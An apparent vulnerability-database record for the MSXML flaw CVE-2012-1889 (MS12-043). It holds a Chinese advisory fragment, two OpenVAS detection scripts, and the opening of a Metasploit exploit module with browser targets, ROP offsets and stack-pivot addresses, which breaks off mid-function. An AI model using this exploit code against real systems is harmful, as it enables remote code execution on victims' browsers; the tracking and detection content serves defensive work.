Windows\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u5e94\u7528XML Core Services 5.0\u7684Microsoft Fix it\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\n* \u914d\u7f6eIE\uff0c\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u65f6\u63d0\u793a\u6216\u7981\u7528\r\n\r\n* \u5728IE\u4e2d\u963b\u6b62ActiveX\u63a7\u4ef6\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff082719615\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\n2719615\uff1aMicrosoft XML Core Services \u4e2d\u7684\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\r\n\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/zh-cn/security/advisory/2719615", "published": "2012-07-11T00:00:00", "type": "seebug", "title": "MSXML\u672a\u521d\u59cb\u5316\u5185\u5b58\u7834\u574f\u6f0f\u6d1e (MS12-043)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-07-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60271", "id": "SSV:60271", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1889"], "description": "This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.", "modified": "2017-04-18T00:00:00", "published": "2012-06-14T00:00:00", "id": "OPENVAS:802864", "href": "http://plugins.openvas.org/nasl.php?oid=802864", "type": "openvas", "title": "Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_xml_core_services_code_exec_vuln.nasl 5963 2017-04-18 09:02:14Z teissa $\n#\n# Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(802864);\n script_version(\"$Revision: 5963 $\");\n script_cve_id(\"CVE-2012-1889\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 11:02:14 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-14 12:09:11 +0530 (Thu, 14 Jun 2012)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Get the vulnerable file version and check\n appropriate patch is applied or not.\");\n\n script_tag(name: \"insight\" , value:\"Microsoft XML Core Services attempts to access\n an object in memory that has not been initialized, which allows an attacker to\n corrupt memory.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation could allow remote\n attackers to execute arbitrary code as the logged-on user.\n\n Impact Level: System/Application\");\n\n script_tag(name: \"affected\" , value:\"Microsoft Expression Web 2\n Microsoft Office Word Viewer\n Microsoft Office Compatibility\n Microsoft Office 2003 Service Pack 3 and prior\n Microsoft Office 2007 Service Pack 3 and prior\n Microsoft Expression Web Service Pack 1 and prior\n Microsoft Groove Server 2007 Service Pack 3 and prior\n Microsoft SharePoint Server 2007 Service Pack 3 and prior\n Microsoft Windows XP x32 Edition Service Pack 3 and prior\n Microsoft Windows XP x64 Edition Service Pack 2 and prior\n Microsoft Windows 7 x32/x64 Edition Service Pack 1 and prior\n Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n Microsoft Windows Vista x32/x64 Edition Service Pack 2 and prior\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1 and prior\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior\");\n\n script_tag(name: \"solution\" , value:\"Apply the Patch from below links,\n http://technet.microsoft.com/en-us/security/advisory/2719615\n http://technet.microsoft.com/en-us/security/bulletin/ms12-043\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49456\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1027157\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2719615\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/advisory/2719615\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-043\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\",\n \"secpod_office_products_version_900032.nasl\",\n \"gb_ms_sharepoint_sever_n_foundation_detect.nasl\",\n \"gb_ms_expression_web_detect.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\ndllVer3 = \"\";\ndllVer4 = \"\";\ndllVer5 = \"\";\ndllVer6 = \"\";\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3, win7:2,\n win7x64:2, win2008:3, win2008r2:2) <= 0)\n{\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(! sysPath){\n exit(0);\n}\n\n## Get Version from Msxml3.dll file\ndllVer3 = fetch_file_version(sysPath, file_name:\"system32\\Msxml3.dll\");\n\n## Check for XML Core Services 3.0\nif(dllVer3)\n{\n ## Windows XP\n if(hotfix_check_sp(xp:4) > 0)\n {\n ## Check for Msxml3.dll version before 8.100.1053.0\n if(version_is_less(version:dllVer3, test_version:\"8.100.1053.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1053.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 2003 x86, Windows XP x64 and Windows 2003 x64\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n ## Check for Msxml3.dll version\n if(version_is_less(version:dllVer3, test_version:\"8.100.1052.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1052.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows Vista and Windows Server 2008\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n ## Check for Msxml3.dll version\n if(version_is_less(version:dllVer3, test_version:\"8.100.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.5005.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 7\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n ## Check for Msxml3.dll version\n if(version_is_less(version:dllVer3, test_version:\"8.110.7600.17036\")){\n Vulnerable_range = \"Version Less than - 8.110.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7600.20000\", test_version2:\"8.110.7600.21226\")){\n Vulnerable_range = \"8.110.7600.20000 - 8.110.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7601.17000\", test_version2:\"8.110.7601.17856\")){\n Vulnerable_range = \"8.110.7601.17000 - 8.110.7601.17856\";\n VULN = TRUE ; \n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7601.21000\", test_version2:\"8.110.7601.22011\"))\n {\n Vulnerable_range = \"8.110.7601.21000 - 8.110.7601.22011\";\n VULN = TRUE ;\n }\n }\n dllVer = dllVer3 ;\n location = sysPath + \"\\system32\\Msxml3.dll\";\n}\n\n## Get Version from Msxml4.dll file\ndllVer4 = fetch_file_version(sysPath, file_name:\"system32\\Msxml4.dll\");\n\n## Check for XML Core Services 4.0\nif(dllVer4)\n{\n if(version_is_less(version:dllVer4, test_version:\"4.30.2114.0\"))\n {\n dllVer = dllVer4 ;\n Vulnerable_range = \"Version Less than - 4.30.2114.0\";\n location = sysPath + \"\\system32\\Msxml4.dll\";\n VULN = TRUE ;\n }\n}\n\n## Get Version from Msxml6.dll file\ndllVer6 = fetch_file_version(sysPath, file_name:\"system32\\Msxml6.dll\");\n\n## Check for XML Core Services 6.0\ndllVer6 = fetch_file_version(sysPath, file_name:\"system32\\Msxml6.dll\");\nif(dllVer6)\n{\n ## Windows XP\n if(hotfix_check_sp(xp:4) > 0)\n {\n ## Check for Msxml6.dll version before 6.20.2501.0\n if(version_is_less(version:dllVer6, test_version:\"6.20.2501.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2501.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 2003 x86, Windows XP x64 and Windows 2003 x64\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n ## Check for Msxml6.dll version before 6.20.2012.0\n if(version_is_less(version:dllVer6, test_version:\"6.20.2012.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2012.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows Vista and Windows Server 2008\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n ## Check for Msxml6.dll version\n if(version_is_less(version:dllVer6, test_version:\"6.20.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.5005.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 7\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n ## Check for Msxml3.dll version\n if(version_is_less(version:dllVer6, test_version:\"6.30.7600.17036\")){\n Vulnerable_range = \"Version Less than - 6.30.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7600.20000\", test_version2:\"6.30.7600.21226\")){\n Vulnerable_range = \"6.30.7600.20000 - 6.30.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.17000\", test_version2:\"6.30.7601.17856\")){\n Vulnerable_range = \"6.30.7601.17000 - 6.30.7601.17856\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.21000\", test_version2:\"6.30.7601.22011\")){\n Vulnerable_range = \"6.30.7601.21000 - 6.30.7601.22011\";\n VULN = TRUE ;\n }\n }\n\n dllVer = dllVer6;\n location = sysPath + \"\\system32\\Msxml6.dll\";\n}\n\nif(VULN)\n{\n report = 'File checked: ' + location + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\n## Check for XML Core Services 5.0\n## Check for Office 2003, 2007, Word Viewer, Compatibility Pack,\n## Groove server 2007 , Sharepoint Server 2007\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[11|12].*\" ||\n get_kb_item(\"SMB/Office/Word/Version\") ||\n get_kb_item(\"SMB/Office/WordCnv/Version\")||\n get_kb_item(\"SMB/Office/Groove/Version\") =~ \"^12\"||\n get_kb_item(\"MS/SharePoint/Server/Ver\") =~ \"^12\" ||\n get_kb_item(\"MS/Expression-Web/Ver\") =~ \"^12\")\n{\n ## Get System CommonFiles Dir Path\n sysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(! sysPath){\n exit(0);\n }\n\n ## Get Version from office patch\n foreach ver (make_list(\"OFFICE11\", \"OFFICE12\"))\n {\n ## Get Version from Msxml5.dll\n sysPath = sysPath + \"\\Microsoft Shared\\\" + ver ;\n\n ## Get Version from Msxml4.dll file\n dllVer5 = fetch_file_version(sysPath, file_name:\"Msxml5.dll\");\n\n if(! dllVer5){\n continue;\n }\n\n ## Check for Msxml6.dll version\n if(version_is_less(version:dllVer5, test_version:\"5.20.1096.0\"))\n {\n report = 'File checked: ' + sysPath + \"\\system32\\Msxml5.dll\" + '\\n' +\n 'File version: ' + dllVer5 + '\\n' +\n 'Vulnerable range: Version Less than - 5.20.1096.0 \\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:03:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1889"], "description": "This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.", "modified": "2020-01-07T00:00:00", "published": "2012-06-14T00:00:00", "id": "OPENVAS:1361412562310802864", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802864", "type": "openvas", "title": "Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802864\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_cve_id(\"CVE-2012-1889\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-14 12:09:11 +0530 (Thu, 14 Jun 2012)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Microsoft XML Core Services attempts to access\n an object in memory that has not been initialized, which allows an attacker to\n corrupt memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote\n attackers to execute arbitrary code as the logged-on user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Expression Web 2\n\n - Microsoft Office Word Viewer\n\n - Microsoft Office Compatibility\n\n - Microsoft Office 2003 Service Pack 3 and prior\n\n - Microsoft Office 2007 Service Pack 3 and prior\n\n - Microsoft Expression Web Service Pack 1 and prior\n\n - Microsoft Groove Server 2007 Service Pack 3 and prior\n\n - Microsoft SharePoint Server 2007 Service Pack 3 and prior\n\n - Microsoft Windows XP x32 Edition Service Pack 3 and prior\n\n - Microsoft Windows XP x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows 7 x32/x64 Edition Service Pack 1 and prior\n\n - Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1027157\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2719615\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2012/2719615\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-043\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"secpod_office_products_version_900032.nasl\",\n \"gb_ms_sharepoint_sever_n_foundation_detect.nasl\", \"gb_ms_expression_web_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3, win7:2,\n win7x64:2, win2008:3, win2008r2:2) <= 0)\n{\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(! sysPath){\n exit(0);\n}\n\ndllVer3 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml3.dll\");\n\nif(dllVer3)\n{\n if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.100.1053.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1053.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.100.1052.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1052.0\";\n VULN = TRUE ;\n }\n }\n\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.100.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.5005.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.110.7600.17036\")){\n Vulnerable_range = \"Version Less than - 8.110.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7600.20000\", test_version2:\"8.110.7600.21226\")){\n Vulnerable_range = \"8.110.7600.20000 - 8.110.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7601.17000\", test_version2:\"8.110.7601.17856\")){\n Vulnerable_range = \"8.110.7601.17000 - 8.110.7601.17856\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7601.21000\", test_version2:\"8.110.7601.22011\"))\n {\n Vulnerable_range = \"8.110.7601.21000 - 8.110.7601.22011\";\n VULN = TRUE ;\n }\n }\n dllVer = dllVer3 ;\n location = sysPath + \"\\system32\\Msxml3.dll\";\n}\n\ndllVer4 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml4.dll\");\n\nif(dllVer4)\n{\n if(version_is_less(version:dllVer4, test_version:\"4.30.2114.0\"))\n {\n dllVer = dllVer4 ;\n Vulnerable_range = \"Version Less than - 4.30.2114.0\";\n location = sysPath + \"\\system32\\Msxml4.dll\";\n VULN = TRUE ;\n }\n}\n\ndllVer6 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml6.dll\");\n\ndllVer6 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml6.dll\");\nif(dllVer6)\n{\n if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.20.2501.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2501.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.20.2012.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2012.0\";\n VULN = TRUE ;\n }\n }\n\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.20.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.5005.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.30.7600.17036\")){\n Vulnerable_range = \"Version Less than - 6.30.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7600.20000\", test_version2:\"6.30.7600.21226\")){\n Vulnerable_range = \"6.30.7600.20000 - 6.30.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.17000\", test_version2:\"6.30.7601.17856\")){\n Vulnerable_range = \"6.30.7601.17000 - 6.30.7601.17856\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.21000\", test_version2:\"6.30.7601.22011\")){\n Vulnerable_range = \"6.30.7601.21000 - 6.30.7601.22011\";\n VULN = TRUE ;\n }\n }\n\n dllVer = dllVer6;\n location = sysPath + \"\\system32\\Msxml6.dll\";\n}\n\nif(VULN)\n{\n report = 'File checked: ' + location + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nwordVer = get_kb_item(\"SMB/Office/Word/Version\");\nwordCnvVer = get_kb_item(\"SMB/Office/WordCnv/Version\");\ngrooveVer = get_kb_item(\"SMB/Office/Groove/Version\");\nshrPtSrvVer = get_kb_item(\"MS/SharePoint/Server/Ver\");\nexpressWebVer = get_kb_item(\"MS/Expression-Web/Ver\");\n\n## Groove server 2007 , Sharepoint Server 2007\nif((officeVer && officeVer =~ \"^1[12]\\.\") ||\n wordVer || wordCnvVer ||\n (grooveVer && grooveVer =~ \"^12\\.\") ||\n (shrPtSrvVer && shrPtSrvVer =~ \"^12\\.\") ||\n (expressWebVer && expressWebVer =~ \"^12\\.\"))\n{\n sysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(! sysPath){\n exit(0);\n }\n\n foreach ver (make_list(\"OFFICE11\", \"OFFICE12\"))\n {\n sysPath = sysPath + \"\\Microsoft Shared\\\" + ver ;\n\n dllVer5 = fetch_file_version(sysPath:sysPath, file_name:\"Msxml5.dll\");\n\n if(! dllVer5){\n continue;\n }\n\n if(version_is_less(version:dllVer5, test_version:\"5.20.1096.0\"))\n {\n report = 'File checked: ' + sysPath + \"\\system32\\Msxml5.dll\" + '\\n' +\n 'File version: ' + dllVer5 + '\\n' +\n 'Vulnerable range: Version Less than - 5.20.1096.0 \\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T11:15:18", "description": "Microsoft XML Core Services MSXML Uninitialized Memory Corruption. CVE-2012-1889. Remote exploit for windows platform", "published": "2012-06-16T00:00:00", "type": "exploitdb", "title": "Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-06-16T00:00:00", "id": "EDB-ID:19186", "href": "https://www.exploit-db.com/exploits/19186/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"9.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :classid => \"{f6D90f11-9c73-11d3-b32e-00C04f990bb4}\",\r\n :method => \"definition\",\r\n :rank => GoodRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption\",\r\n 'Description' => %q{\r\n This module exploits a memory corruption flaw in Microsoft XML Core Services\r\n when trying to access an uninitialized Node with the getDefinition API, which\r\n may corrupt memory allowing remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'inking26', # Reliable exploitation\r\n 'binjo', # Metasploit module\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-1889' ],\r\n [ 'BID', '53934' ],\r\n [ 'OSVDB', '82873'],\r\n [ 'MSB', 'MS12-043'],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],\r\n [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],\r\n [ 'URL', 'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ],\r\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # msxml3.dll 8.90.1101.0\r\n [ 'Automatic', {} ],\r\n [\r\n 'IE 6 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x100',\r\n 'Rop' => nil,\r\n 'RandomHeap' => false\r\n }\r\n ],\r\n [\r\n 'IE 7 on Windows XP SP3 / Vista SP2',\r\n {\r\n 'Offset' => '0x100',\r\n 'Rop' => nil,\r\n 'RandomHeap' => false\r\n }\r\n ],\r\n [\r\n 'IE 8 on Windows XP SP3',\r\n {\r\n 'Rop' => :msvcrt,\r\n 'RandomHeap' => false,\r\n 'RopChainOffset' => '0x5f4',\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll\r\n }\r\n ],\r\n [\r\n 'IE 8 with Java 6 on Windows XP SP3',\r\n {\r\n 'Rop' => :jre,\r\n 'RandomHeap' => false,\r\n 'RopChainOffset' => '0x5f4',\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n }\r\n ],\r\n [\r\n 'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',\r\n {\r\n 'Rop' => :jre,\r\n 'RandomHeap' => false,\r\n 'RopChainOffset' => '0x5f4',\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n }\r\n ],\r\n [\r\n 'IE 9 with Java 6 on Windows 7 SP1',\r\n {\r\n 'Rop' => :jre,\r\n 'RandomHeap' => true,\r\n 'RopChainOffset' => 0x5FC,\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Jun 12 2012\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\r\n return targets[1] #IE 6 on Windows XP SP3\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\r\n return targets[2] #IE 7 on 